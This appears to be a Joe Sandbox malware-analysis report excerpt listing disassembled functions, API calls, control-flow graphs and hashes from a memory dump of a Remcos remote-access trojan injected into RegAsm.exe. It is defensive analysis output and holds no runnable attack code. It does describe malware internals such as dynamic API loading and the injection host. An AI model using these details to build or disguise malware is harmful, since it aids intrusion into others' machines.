                                                          • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Psapi), ref: 0041CBF6
                                                          • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CBFF
                                                          • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                          • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC19
                                                          • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(shcore), ref: 0041CC2B
                                                          • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC2E
                                                          • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(user32), ref: 0041CC3F
                                                          • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC42
                                                          • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(ntdll), ref: 0041CC54
                                                          • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC57
                                                          • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(kernel32), ref: 0041CC63
                                                          • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC66
                                                          • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                          • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC7A
                                                          • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                          • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC8E
                                                          • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shell32), ref: 0041CC9F
                                                          • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCA2
                                                          • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                          • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCB6
                                                          • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                          • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCCA
                                                          • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                          • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCDE
                                                          • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                          • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCF2
                                                          • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                          • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD06
                                                          • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CD14
                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 0040EA29
                                                          • Part of subcall function 00410F72: __EH_prolog.LIBCMT ref: 00410F77
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                        • String ID: SG$ SG$8SG$8SG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Exe$Inj$PSG$Remcos Agent initialized$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                                                        • API String ID: 2830904901-3701325316
                                                        • Opcode ID: faaf597f9ba31a578cff63a99c76a37e9239b7d9982a30c10bb73a990bef0fa7
                                                        • Instruction ID: f870588dacc207cf398a21a9077505b2b75b96970711a81e27f166ce8512e3fa
                                                        • Opcode Fuzzy Hash: faaf597f9ba31a578cff63a99c76a37e9239b7d9982a30c10bb73a990bef0fa7
                                                        • Instruction Fuzzy Hash: 9B32F960B043412BDA24B7729C57B7E26994F80748F50483FB9467B2E3EEBC8D45839E
                                                        Function 00404E26 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 65synchronizationCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,?,?,?,00474EF8,?), ref: 00404E38
                                                        • SetEvent.KERNEL32(?), ref: 00404E43
                                                        • CloseHandle.KERNEL32(?), ref: 00404E4C
                                                        • closesocket.WS2_32(?), ref: 00404E5A
                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404E91
                                                        • SetEvent.KERNEL32(?), ref: 00404EA2
                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404EA9
                                                        • SetEvent.KERNEL32(?), ref: 00404EBA
                                                        • CloseHandle.KERNEL32(?), ref: 00404EBF
                                                        • CloseHandle.KERNEL32(?), ref: 00404EC4
                                                        • SetEvent.KERNEL32(?), ref: 00404ED1
                                                        • CloseHandle.KERNEL32(?), ref: 00404ED6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                        • String ID: PkGNG
                                                        • API String ID: 3658366068-263838557
                                                        • Opcode ID: 1684f4f73009feb69d70dfcf302ee3e014c0b3edf4bc9f5cbab22c6bf1399946
                                                        • Instruction ID: 681aebbacbf541c1c6cd6dfca6fba55586e42b113d9ea1c0d4e3a90daa9851ad
                                                        • Opcode Fuzzy Hash: 1684f4f73009feb69d70dfcf302ee3e014c0b3edf4bc9f5cbab22c6bf1399946
                                                        • Instruction Fuzzy Hash: DE21EA71154B04AFDB216B26DC49B1BBBA1FF40326F104A2DE2E211AF1CB79B851DB58
                                                        Function 0044ACC9 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 216COMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 465 44acc9-44ace2 466 44ace4-44acf4 call 4467e6 465->466 467 44acf8-44acfd 465->467 466->467 474 44acf6 466->474 469 44acff-44ad07 467->469 470 44ad0a-44ad2e MultiByteToWideChar 467->470 469->470 472 44ad34-44ad40 470->472 473 44aec1-44aed4 call 43502b 470->473 475 44ad94 472->475 476 44ad42-44ad53 472->476 474->467 478 44ad96-44ad98 475->478 479 44ad55-44ad64 call 457210 476->479 480 44ad72-44ad83 call 4461b8 476->480 482 44aeb6 478->482 483 44ad9e-44adb1 MultiByteToWideChar 478->483 479->482 492 44ad6a-44ad70 479->492 480->482 493 44ad89 480->493 487 44aeb8-44aebf call 435ecd 482->487 483->482 486 44adb7-44adc9 call 448c33 483->486 495 44adce-44add2 486->495 487->473 494 44ad8f-44ad92 492->494 493->494 494->478 495->482 497 44add8-44addf 495->497 498 44ade1-44ade6 497->498 499 44ae19-44ae25 497->499 498->487 500 44adec-44adee 498->500 501 44ae27-44ae38 499->501 502 44ae71 499->502 500->482 505 44adf4-44ae0e call 448c33 500->505 503 44ae53-44ae64 call 4461b8 501->503 504 44ae3a-44ae49 call 457210 501->504 506 44ae73-44ae75 502->506 511 44aeaf-44aeb5 call 435ecd 503->511 519 44ae66 503->519 504->511 517 44ae4b-44ae51 504->517 505->487 520 44ae14 505->520 510 44ae77-44ae90 call 448c33 506->510 506->511 510->511 523 44ae92-44ae99 510->523 511->482 522 44ae6c-44ae6f 517->522 519->522 520->482 522->506 524 44aed5-44aedb 523->524 525 44ae9b-44ae9c 523->525 526 44ae9d-44aead WideCharToMultiByte 524->526 525->526 526->511 527 44aedd-44aee4 call 435ecd 526->527 527->487
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,tC,0043EA74,?,?,PkGNG,0044AF1A,00000001,00000001,A4E85006), ref: 0044AD23
                                                        • __alloca_probe_16.LIBCMT ref: 0044AD5B
                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,PkGNG,0044AF1A,00000001,00000001,A4E85006,?,?,?), ref: 0044ADA9
                                                        • __alloca_probe_16.LIBCMT ref: 0044AE40
                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,A4E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AEA3
                                                        • __freea.LIBCMT ref: 0044AEB0
                                                          • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                                        • __freea.LIBCMT ref: 0044AEB9
                                                        • __freea.LIBCMT ref: 0044AEDE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                        • String ID: PkGNG$tC
                                                        • API String ID: 3864826663-4196309852
                                                        • Opcode ID: a3cbb47ee8d45342a2f0fb6a002504832f0ae0c467949e665f7c3dc78735deda
                                                        • Instruction ID: de232b2c18f644b0009b05ef7aad101f1c584e700cc6948cb3d999d9ae9be8cc
                                                        • Opcode Fuzzy Hash: a3cbb47ee8d45342a2f0fb6a002504832f0ae0c467949e665f7c3dc78735deda
                                                        • Instruction Fuzzy Hash: 41514C72A80206AFFB258F64CC41EBF77A9DB44750F25462EFC14D7240EB38DC60869A
                                                        Function 004485E6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 538 4485e6-4485fa 539 448607-448622 LoadLibraryExW 538->539 540 4485fc-448605 538->540 542 448624-44862d GetLastError 539->542 543 44864b-448651 539->543 541 44865e-448660 540->541 544 44863c 542->544 545 44862f-44863a LoadLibraryExW 542->545 546 448653-448654 FreeLibrary 543->546 547 44865a 543->547 548 44863e-448640 544->548 545->548 546->547 549 44865c-44865d 547->549 548->543 550 448642-448649 548->550 549->541 550->549
                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,0044858D,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue), ref: 00448618
                                                        • GetLastError.KERNEL32(?,0044858D,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367), ref: 00448624
                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044858D,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000), ref: 00448632
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LibraryLoad$ErrorLast
                                                        • String ID:
                                                        • API String ID: 3177248105-0
                                                        • Opcode ID: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                        • Instruction ID: 239c22332ac31c5199b3ba4764290be2907fca328f5d1df1ca03bb1201a614b6
                                                        • Opcode Fuzzy Hash: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                        • Instruction Fuzzy Hash: D401FC32602322EBDB618A78EC4495F7758AF15BA2B22093AF909D3241DF24DC01C6EC
                                                        Function 00448C33 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 551 448c33-448c55 call 44854a 553 448c5a-448c61 551->553 554 448c63-448c88 553->554 555 448c8a-448ca4 call 448cbb LCMapStringW 553->555 559 448caa-448cb8 call 43502b 554->559 555->559
                                                        APIs
                                                        • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,A4E85006,00000001,?,0043CEA5), ref: 00448CA4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: String
                                                        • String ID: LCMapStringEx$PkGNG
                                                        • API String ID: 2568140703-1065776982
                                                        • Opcode ID: 86a11f55cf6387bee299305d7f05c1eeea946d3ceab5384c32c6ec147cd8a697
                                                        • Instruction ID: c3f282dcf0fd97a5c368a601407465e3bede0a00add2935535d0592c00eac712
                                                        • Opcode Fuzzy Hash: 86a11f55cf6387bee299305d7f05c1eeea946d3ceab5384c32c6ec147cd8a697
                                                        • Instruction Fuzzy Hash: 3001253254120CFBCF02AF91DD02EEE7F66EF08751F04416AFE1965161CA3A8971EB99
                                                        Function 0040D0A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 563 40d0a4-40d0d0 call 401fab CreateMutexA GetLastError
                                                        APIs
                                                        • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
                                                        • GetLastError.KERNEL32 ref: 0040D0BE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateErrorLastMutex
                                                        • String ID: SG
                                                        • API String ID: 1925916568-3189917014
                                                        • Opcode ID: eabddf02165d7cb7ab60b975d5c9d75332e346c4e6257b5baf50d4a4f7034b19
                                                        • Instruction ID: 57749e379dff282fb0cfe370275dd79dddcb706c5168e3a31171962593876721
                                                        • Opcode Fuzzy Hash: eabddf02165d7cb7ab60b975d5c9d75332e346c4e6257b5baf50d4a4f7034b19
                                                        • Instruction Fuzzy Hash: 0DD012B0605700EBDB186770ED5975839559744702F40487AB50FD99F1CBBC88908519
                                                        Function 0044EE44 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 566 44ee44-44ee78 GetCPInfo 567 44ef6e-44ef7b 566->567 568 44ee7e 566->568 569 44ef81-44ef91 567->569 570 44ee80-44ee8a 568->570 571 44ef93-44ef9b 569->571 572 44ef9d-44efa4 569->572 570->570 573 44ee8c-44ee9f 570->573 574 44efb0-44efb2 571->574 575 44efb4 572->575 576 44efa6-44efad 572->576 577 44eec0-44eec2 573->577 580 44efb6-44efc5 574->580 575->580 576->574 578 44eec4-44eefb call 4511ac call 44aee6 577->578 579 44eea1-44eea8 577->579 591 44ef00-44ef2b call 44aee6 578->591 581 44eeb7-44eeb9 579->581 580->569 583 44efc7-44efd7 call 43502b 580->583 584 44eeaa-44eeac 581->584 585 44eebb-44eebe 581->585 584->585 588 44eeae-44eeb6 584->588 585->577 588->581 594 44ef2d-44ef37 591->594 595 44ef47-44ef49 594->595 596 44ef39-44ef45 594->596 598 44ef60 595->598 599 44ef4b-44ef50 595->599 597 44ef57-44ef5e 596->597 600 44ef67-44ef6a 597->600 598->600 599->597 600->594 601 44ef6c 600->601 601->583
                                                        APIs
                                                        • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0044EE69
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Info
                                                        • String ID:
                                                        • API String ID: 1807457897-3916222277
                                                        • Opcode ID: c218bb7fec2994ea758599c37fad7e7d2b1b4cc9144a8923480740bb4dc68c2e
                                                        • Instruction ID: 2d4132b881e94a0a9fd0de77a922cbe9b4a8b8c61ff6a95216f325efaac8b060
                                                        • Opcode Fuzzy Hash: c218bb7fec2994ea758599c37fad7e7d2b1b4cc9144a8923480740bb4dc68c2e
                                                        • Instruction Fuzzy Hash: 7E411070504748AFEF218E25CC84AF7BBB9FF45304F2404EEE59987142D2399A46DF65
                                                        Function 00448B04 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 602 448b04-448b32 call 44854a 605 448b34-448b47 602->605 606 448b49-448b4f InitializeCriticalSectionAndSpinCount 602->606 607 448b55-448b63 call 43502b 605->607 606->607
                                                        APIs
                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0044BFCF,-00000020,00000FA0,00000000,00467388,00467388), ref: 00448B4F
                                                        Strings
                                                        • InitializeCriticalSectionEx, xrefs: 00448B1F
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CountCriticalInitializeSectionSpin
                                                        • String ID: InitializeCriticalSectionEx
                                                        • API String ID: 2593887523-3084827643
                                                        • Opcode ID: e7865eab5a0c5ee74c944b46d32e98b8efcd507c693a88801e0629148af4ccbf
                                                        • Instruction ID: 6b0d226957fc5e3530c80ec385177705bb254131620a7d42d33c8bf65efe755d
                                                        • Opcode Fuzzy Hash: e7865eab5a0c5ee74c944b46d32e98b8efcd507c693a88801e0629148af4ccbf
                                                        • Instruction Fuzzy Hash: F0F0E93164021CFBCB025F55DC06E9E7F61EF08B22B00406AFD0956261DF3A9E61D6DD
                                                        Function 00448790 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 612 448790-4487b2 call 44854a 614 4487b7-4487be 612->614 615 4487c0-4487cd 614->615 616 4487cf TlsAlloc 614->616 617 4487d5-4487e3 call 43502b 615->617 616->617
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Alloc
                                                        • String ID: FlsAlloc
                                                        • API String ID: 2773662609-671089009
                                                        • Opcode ID: ceb6eb44fdb2e1caf22400305205ab7015617d2dc64213a21c59039fb0580a8a
                                                        • Instruction ID: f8901b274c9ac7999680b04b2037e580393277d5e39e0d99f0e7f02c98ef4e36
                                                        • Opcode Fuzzy Hash: ceb6eb44fdb2e1caf22400305205ab7015617d2dc64213a21c59039fb0580a8a
                                                        • Instruction Fuzzy Hash: 8FE05530640318F7D3016B21DC16A2FBB94DB04B22B10006FFD0553241EE794D15C5CE
                                                        Function 00438E14 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 622 438e14-438e29 call 438cf3 624 438e2e-438e35 622->624 625 438e37-438e45 call 434c2d 624->625 626 438e46-438e48 TlsAlloc 624->626
                                                        APIs
                                                        • try_get_function.LIBVCRUNTIME ref: 00438E29
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: try_get_function
                                                        • String ID: FlsAlloc
                                                        • API String ID: 2742660187-671089009
                                                        • Opcode ID: 1eb4f256e7c4e0b4dee7f2b7c001ffdd8c026b266bbfd6c5aa47d90a079f9e5b
                                                        • Instruction ID: b64d3ab94c56a33c1928a034b10f94234fe941941be7f39555266fb58f36a209
                                                        • Opcode Fuzzy Hash: 1eb4f256e7c4e0b4dee7f2b7c001ffdd8c026b266bbfd6c5aa47d90a079f9e5b
                                                        • Instruction Fuzzy Hash: 09D02B31BC1328B6C51032955C03BD9B6048B00FF7F002067FF0C61283899E592082DE
                                                        Function 0044F199 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 630 44f199-44f1bd call 44ed6c 633 44f1cd-44f1d4 630->633 634 44f1bf-44f1c8 call 44eddf 630->634 636 44f1d7-44f1dd 633->636 641 44f37a-44f389 call 43502b 634->641 638 44f1e3-44f1ef 636->638 639 44f2cd-44f2ec call 436f10 636->639 638->636 642 44f1f1-44f1f7 638->642 648 44f2ef-44f2f4 639->648 645 44f2c5-44f2c8 642->645 646 44f1fd-44f203 642->646 647 44f379 645->647 646->645 650 44f209-44f215 IsValidCodePage 646->650 647->641 651 44f2f6-44f2fb 648->651 652 44f32b-44f335 648->652 650->645 653 44f21b-44f228 GetCPInfo 650->653 654 44f2fd-44f303 651->654 655 44f328 651->655 652->648 658 44f337-44f35e call 44ed2e 652->658 656 44f2b2-44f2b8 653->656 657 44f22e-44f24f call 436f10 653->657 660 44f31c-44f31e 654->660 655->652 656->645 661 44f2ba-44f2c0 call 44eddf 656->661 669 44f251-44f258 657->669 670 44f2a2 657->670 671 44f35f-44f36e 658->671 666 44f305-44f30b 660->666 667 44f320-44f326 660->667 673 44f376-44f377 661->673 666->667 672 44f30d-44f318 666->672 667->651 667->655 674 44f25a-44f25f 669->674 675 44f27b-44f27e 669->675 677 44f2a5-44f2ad 670->677 671->671 676 44f370-44f371 call 44ee44 671->676 672->660 673->647 674->675 678 44f261-44f267 674->678 680 44f283-44f28a 675->680 676->673 677->676 681 44f26f-44f271 678->681 680->680 682 44f28c-44f2a0 call 44ed2e 680->682 683 44f273-44f279 681->683 684 44f269-44f26e 681->684 682->677 683->674 683->675 684->681
                                                        APIs
                                                          • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
                                                        • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044F03A,?,00000000), ref: 0044F20D
                                                        • GetCPInfo.KERNEL32(00000000,0044F03A,?,?,?,0044F03A,?,00000000), ref: 0044F220
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CodeInfoPageValid
                                                        • String ID:
                                                        • API String ID: 546120528-0
                                                        • Opcode ID: 747d95ecf2005c527016839393fb107aa8d78a19bbf0a74999b8906be39dfc0a
                                                        • Instruction ID: 491245c4813b68437391e3e70942b885a5b84425ef1b1be509cf98dd56c33fdc
                                                        • Opcode Fuzzy Hash: 747d95ecf2005c527016839393fb107aa8d78a19bbf0a74999b8906be39dfc0a
                                                        • Instruction Fuzzy Hash: A05153749002469EFB208F76C8816BBBBE4FF01304F1480BFD48687251E67E994A8B99
                                                        Function 0044EFD8 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 687 44efd8-44f002 call 448295 call 44f0f7 call 44ed6c 694 44f004-44f006 687->694 695 44f008-44f01d call 4461b8 687->695 696 44f05b-44f05e 694->696 699 44f04d 695->699 700 44f01f-44f035 call 44f199 695->700 701 44f04f-44f05a call 446802 699->701 704 44f03a-44f040 700->704 701->696 706 44f042-44f047 call 44062d 704->706 707 44f05f-44f063 704->707 706->699 709 44f065 call 4446b7 707->709 710 44f06a-44f075 707->710 709->710 713 44f077-44f081 710->713 714 44f08c-44f0a6 710->714 713->714 716 44f083-44f08b call 446802 713->716 714->701 715 44f0a8-44f0af 714->715 715->701 717 44f0b1-44f0c8 call 44ec42 715->717 716->714 717->701 722 44f0ca-44f0d4 717->722 722->701
                                                        APIs
                                                          • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                          • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                          • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                          • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                          • Part of subcall function 0044F0F7: _abort.LIBCMT ref: 0044F129
                                                          • Part of subcall function 0044F0F7: _free.LIBCMT ref: 0044F15D
                                                          • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
                                                        • _free.LIBCMT ref: 0044F050
                                                        • _free.LIBCMT ref: 0044F086
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free$ErrorLast_abort
                                                        • String ID:
                                                        • API String ID: 2991157371-0
                                                        • Opcode ID: e5cd2967445071e6bfe31aa1a48247ff35ff00e78bbd9f02ad68eb6c8bd53105
                                                        • Instruction ID: a9f826519387c1ac895116d2974c89b4af6d1f604a138ae73dd4863203302c4b
                                                        • Opcode Fuzzy Hash: e5cd2967445071e6bfe31aa1a48247ff35ff00e78bbd9f02ad68eb6c8bd53105
                                                        • Instruction Fuzzy Hash: 2D31D371900104AFEB10EB69D441B9A77F4EF81325F2540AFE5049B2A3DB7A5D44CB58
                                                        Function 0044854A Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 723 44854a-448574 724 448576-448578 723->724 725 4485df 723->725 726 44857e-448584 724->726 727 44857a-44857c 724->727 728 4485e1-4485e5 725->728 729 448586-448588 call 4485e6 726->729 730 4485a0 726->730 727->728 733 44858d-448590 729->733 732 4485a2-4485a4 730->732 734 4485a6-4485b4 GetProcAddress 732->734 735 4485cf-4485dd 732->735 736 4485c1-4485c7 733->736 737 448592-448598 733->737 738 4485b6-4485bf call 434591 734->738 739 4485c9 734->739 735->725 736->732 737->729 740 44859a 737->740 738->727 739->735 740->730
                                                        APIs
                                                        • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367,00000000), ref: 004485AA
                                                        • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004485B7
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressProc__crt_fast_encode_pointer
